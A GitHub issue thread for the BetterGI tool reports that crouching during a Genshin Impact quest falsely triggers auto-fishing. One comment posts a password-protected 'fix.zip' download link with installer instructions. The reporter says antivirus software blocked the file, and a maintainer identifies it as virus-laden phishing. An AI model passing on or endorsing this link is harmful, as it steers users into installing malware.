### ISSUE TITLE
[bug] 神秘岛跟随马拉尼潜入山谷时下蹲会识别为自动钓鱼

### ISSUE THREAD

**Issue by bananas12138** [babalae/better-genshin-impact#561]
- 系统环境 / System Environment：
Windows 11 专业工作站版
版本	23H2
安装日期	‎25/‎6/‎2023
操作系统版本	22631.3007
体验	Windows Feature Experience Pack 1000.22681.1000.0

- BetterGI版本号 / BetterGI Version：
0.32.1

- 问题描述 / Description of the issue：
传说任务：鳍游龙的聚会
进度到：深入山谷（根据地图的指示，马拉尼带领你们来到一处聚集着大群鳍游龙的山谷）
![原神 29_8_2024 下午 3_14_28](https://github.com/user-attachments/assets/432e99a6-e12b-40b5-8209-a87763f39e72)
![原神 29_8_2024 下午 3_10_38](https://github.com/user-attachments/assets/20eb6cb6-e3e0-4be7-bac6-ead38185ac88)
下蹲时可见左下角触发自动钓鱼

- 复现步骤 / Reproduction steps：
在此处直接左键下蹲就会触发
![原神 29_8_2024 下午 3_18_15](https://github.com/user-attachments/assets/db77672d-da9b-4770-aa06-46cff49b18a0)

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bananas12138** [comment]
> 下载 https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file 密码：changeme 在安装程序菜单中，选择“gcc”。

您好，请问这是什么？下载后被卡巴斯基安全软件拦截了。

**Comment by huiyadanli** [comment]
被删除的评论是Github上的钓鱼信息，内含病毒，请不要下载

**Comment by huiyadanli** [comment]
关于钓鱼的功能确实存在此类问题，暂时没有想法要解决，需要更换识别算法。

不建议在不钓鱼的时候一直打开钓鱼开关
